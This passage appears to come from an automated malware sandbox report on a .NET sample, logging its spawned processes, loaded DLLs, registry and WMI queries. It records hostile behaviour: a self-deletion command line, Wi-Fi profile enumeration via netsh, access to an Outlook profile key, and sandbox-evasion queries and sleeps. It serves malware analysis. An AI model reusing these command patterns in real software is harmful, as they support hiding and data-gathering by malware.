      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr "SSID BSSID Signal"
      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && DEL /F /S /Q /A "C:\Users\user\Desktop\file.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 3
      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"Jump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"Jump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && DEL /F /S /Q /A "C:\Users\user\Desktop\file.exe"Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profilesJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /R /C:"[ ]:[ ]"Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssidJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr "SSID BSSID Signal"Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 3Jump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: rasapi32.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: rasman.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: rtutils.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: windowscodecs.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
      Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: onex.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
      Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: onex.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
      Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
      Source: C:\Windows\System32\timeout.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
      Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
      Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: file.exeStatic PE information: 0xE480C158 [Mon Jun 25 20:55:52 2091 UTC]
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FFD9B8A4BD3 pushad ; retf 0_2_00007FFD9B8A4BD9
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FFD9B8A477E push ds; iretd 0_2_00007FFD9B8A477F

      Hooking and other Techniques for Hiding and Protection

      barindex
      Self deletion via cmd or bat file
      Source: C:\Users\user\Desktop\file.exeProcess created: "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && DEL /F /S /Q /A "C:\Users\user\Desktop\file.exe"
      Source: C:\Users\user\Desktop\file.exeProcess created: "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && DEL /F /S /Q /A "C:\Users\user\Desktop\file.exe"Jump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE DriveType = 3
      Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
      Source: C:\Users\user\Desktop\file.exeMemory allocated: 1D7A5A70000 memory reserve | memory write watchJump to behavior
      Source: C:\Users\user\Desktop\file.exeMemory allocated: 1D7BF310000 memory reserve | memory write watchJump to behavior
      Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 600000Jump to behavior
      Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 599875Jump to behavior
      Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 599766Jump to behavior
      Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 599656Jump to behavior
      Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 599547Jump to behavior
      Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 599438Jump to behavior
      Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 599313Jump to behavior
      Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 599188Jump to behavior
      Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 599063Jump to behavior
      Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 598946Jump to behavior
      Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 598839Jump to behavior
      Source: C:\Users\user\Desktop\file.exeWindow / User API: threadDelayed 1903Jump to behavior
      Source: C:\Users\user\Desktop\file.exeWindow / User API: threadDelayed 1616Jump to behavior
      Source: C:\Users\user\Desktop\file.exe TID: 7952Thread sleep time: -6456360425798339s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\file.exe TID: 7952Thread sleep time: -600000s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\file.exe TID: 7952Thread sleep time: -599875s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\file.exe TID: 7952Thread sleep time: -599766s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\file.exe TID: 7952Thread sleep time: -599656s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\file.exe TID: 7952Thread sleep time: -599547s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\file.exe TID: 7952Thread sleep time: -599438s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\file.exe TID: 7952Thread sleep time: -599313s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\file.exe TID: 7952Thread sleep time: -599188s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\file.exe TID: 7952Thread sleep time: -599063s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\file.exe TID: 7952Thread sleep time: -598946s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\file.exe TID: 7952Thread sleep time: -598839s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
